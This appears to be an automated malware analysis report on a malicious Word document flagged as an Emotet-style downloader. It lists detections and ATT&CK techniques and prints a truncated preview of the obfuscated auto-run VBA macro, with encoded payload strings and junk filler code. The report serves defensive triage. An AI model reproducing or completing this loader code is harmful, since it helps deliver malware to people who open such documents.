Verdict: MALICIOUS (Risk Score: 224)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating that it is designed to execute automatically when the document is opened. The macro calls CreateObject and appears to be obfuscated, which is consistent with a downloader intended to fetch and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0.
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45443 bytes |

SHA-256: d61007f03fdebe38d8a535b429604310cb54be9d569c6f1aa11f18b4ba82b569

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (the carved artifact contains 11 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "KzDGmMTGzwXQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jwwkZFiWOotXWO"
Function VtNHXaSRw()
On Error Resume Next
Select Case WNTvb
Case 51069
DGMjzQ = 51354
pIIfUV = Sqr(96297)
Case 18773
iQjkAq = CSng(RzaIJk)
ZUJqa = IHwsDi
End Select
hjScSB = zZNIR("R.1zXiIfneUtzaS8dTV6sxc9e9dDxfQZ17KP69wF5qrqM+U5cUN9L6k3NYwPnaObhYPk1cZ6e37cc9f7kRF1OP+vIy1FvqO++e3+RSh+O1JvEiR1VlpY", 3, 108)
Select Case NOsjYD
Case 73042
KrLCP = 68153
ApSmE = Sqr(14465)
Case 66450
KfYiZ = CSng(UqhSLO)
GrjGw = OcznKr
End Select
Select Case zvTRv
Case 12183
pHTwHD = 48315
QjYhEa = Sqr(93128)
Case 13042
kvsGG = CSng(mXswro)
mQNaX = KhKZLf
End Select
NPjtfG = zZNIR("C238yR5GPHdc57ivLl1c/84ii9S6YqDdGAmHYr3GFFnxXmG7x9q6kjqWsSr9sxzzpmF3ls51UUn/d8pL7vz3Ko84fux7n1/fMeD0Et//+Hir8/fmz+Ll7u39qfb4nP3Ury+3VRNeXHx09f740V6lS/S5SLNV4vrNPx1tUgvrxar8Gb0c.", 3, 171)
Select Case jMdPlD
Case 78368
hAOnj = 34186
bOFhtL = Sqr(94403)
Case 16107
iCRwZ = CSng(VhaaI)
tdNnzs = PznnN
End Select
Select Case kztNsm
Case 26788
GCPjzv = 91400
bUvFh = Sqr(20266)
Case 90788
LSjmSK = CSng(CcUlaR)
qGmwE = ijjiXL
End Select
URLGkEkG = zZNIR("w2/fP//z88y9vN2/t7d3LYzN8++Pu+4eLsOe3u6ouPla/vRUv7e+vtmeHPS+v3PN6/7m7KV7fXqpmuPu+vn27+fC3Dz9cXS6vs1/TNL28Wub/S5ZZvkzz/6aXySr5tsqXq3pYf3Jl4vppnbiycPd+vXabnav9unDlzn2d1l/dl86euftH77.UBmXa", 3, 177)
Select Case IczCa
Case 4340
BZFbcw = 25996
HiKUB = Sqr(25727)
Case 57303
SkFISc = CSng(COHJja)
SLYVMR = LUIYR
End Select
Select Case iMIRnO
Case 72187
JQcrVC = 73271
ESkjo = Sqr(49978)
Case 96177
VQNPc = CSng(bELjTf)
prXjG = lvRFV
End Select
ErkbiO = zZNIR("wV1GfcHO2vg2RMfqy/kC+p5VH2lqPtprvsR+5AfqCfUebDrQH/Nn53F50l1kDOf433KR8QJ+1N79ma3nQfegL056tBwYd48zPVo8QdvIZ+fke8T8761vCd+MS9O9mytPsyfgXW3tTxkHI883+xH3SfkLdYz91t9c/1WdjIfDIeIG+0Cf1m8lc/9wHyo53y0J3DekxctPwIj0vi", 3, 198)
Select Case GwGjw
Case 19500
OpwWA = 42413
NpXjp = Sqr(68689)
Case 11873
PaNCi = CSng(MXDLr)
VzUXPW = RVsVW
End Select
Select Case cwfvv
Case 48080
ZcXvi = 25252
Tpcwzo = Sqr(84793)
Case 87803
PcSKh = CSng(lXuJVV)
wbZXOF = mizpqS
End Select
IlWDSvjirU = zZNIR("@mzB4UuMIu4J7hd+DamV97xTsn7sSpEd6Ni3bZeeNcd+G8J8R7Yr1uFd8t6ll3VwG", 5, 57)
Select Case pfSORi
Case 76990
TdOUu = 83893
BUrYbt = Sqr(2697)
Case 44590
amwVli = CSng(TOjvsb)
DnEjHv = tLDmd
End Select
Select Case oXpTOh
Case 73271
bjDsa = 76323
EwVTF = Sqr(89257)
Case 25352
IwWOC = CSng(iaSGYT)
Njuzj = SAXPcA
End Select
JOqmUIvrNi = zZNIR("5RidkCFym86k7Yv572ku9Xs3xRB2TR3PpPfDi1kf+IW9FfYt+ZLw8qN4884Z9sledVOKTmnWCuJEiK7", 7, 70)
Select Case Qpwabh
Case 52236
hVsSj = 53210
FklCUv = Sqr(81978)
Case 30162
UYPuCl = CSng(tNWRpb)
irrojO = jwCWv
End Select
Select Case ilRlY
Case 49052
MsUJp = 10054
EdKarE = Sqr(40162)
Case 2422
CMovY = CSng(IYWro)
dmrrwd = ikwUr
End Select
MkwfwIM = zZNIR("4jINr3yBbwwGn79JHs987+BPZXZeeKTeGwdn73VF+wzfvSKS886Nr8ceaf29I88FfO1OvPiZPs7rXfy0/KVcSd/hc+oR8T9qHitDK/toPr0rPvaE3/wwAZ1Cb4E71u+K1+Z5zEf6vc8n6ivJMLtQTgnWGd1txE/c9+J9cx8
```

... (truncated)